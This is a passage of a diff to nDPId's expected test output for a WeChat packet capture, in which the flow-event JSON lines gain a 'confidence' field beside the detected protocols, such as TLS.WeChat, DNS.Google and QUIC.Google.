-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00650{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00649{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1492167378674,"flow_last_seen":1492167401175,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":15799,"flow_avg_l4_payload_len":394,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54094,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1492167378926,"flow_last_seen":1492167401170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":8225,"flow_tot_l4_payload_len":23125,"flow_avg_l4_payload_len":592,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54095,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167380581,"flow_last_seen":1492167401124,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1492167400812,"flow_last_seen":1492167448100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":17075,"flow_avg_l4_payload_len":388,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1492167401063,"flow_last_seen":1492167448091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":12550,"flow_avg_l4_payload_len":330,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1492167452759,"flow_last_seen":1492167467498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":32873,"flow_avg_l4_payload_len":608,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1492167453010,"flow_last_seen":1492167467495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":8726,"flow_avg_l4_payload_len":323,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1492167454457,"flow_last_seen":1492167470188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4284,"flow_tot_l4_payload_len":60307,"flow_avg_l4_payload_len":701,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1492167454458,"flow_last_seen":1492167467494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":16177,"flow_avg_l4_payload_len":577,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00676{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1492167454818,"flow_last_seen":1492167477932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3993,"flow_tot_l4_payload_len":57290,"flow_avg_l4_payload_len":596,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1492167455528,"flow_last_seen":1492167467498,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3531,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54104,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167351026,"flow_last_seen":1492167351061,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":218,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":55862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleDocs","breed":"Acceptable","category":"Collaborative"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167345896,"flow_last_seen":1492167360666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":6,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167350385,"flow_last_seen":1492167350562,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6290,"flow_avg_l4_payload_len":483,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.67","src_port":51507,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1492167350333,"flow_last_seen":1492167350372,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":225,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":46078,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1492167351067,"flow_last_seen":1492167352398,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":4266,"flow_avg_l4_payload_len":328,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.198.46","src_port":57591,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleDocs","breed":"Acceptable","category":"Collaborative"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
 00572{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1492167345896,"flow_last_seen":1492167360663,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":7,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00596{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00632{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167382020,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":3,"midstream":1,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40740,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00585{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip6","src_ip":"fe80::7a92:9cff:fe0f:a88e","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00576{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":840,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1492167338426,"flow_last_seen":1492167458187,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1492167617247,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -251,13 +251,13 @@
 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":843,"source":"wechat.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1492167617498,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1492167617498,"pkt":"8IQvSpdgeJKcD6iOCABFAAA82VRAAEAGO+jAqAFny82XotNgAbuDb2VoAAAAAKACchA2DwAAAgQFtAQCCAoAMbw8AAAAAAEDAwc="}
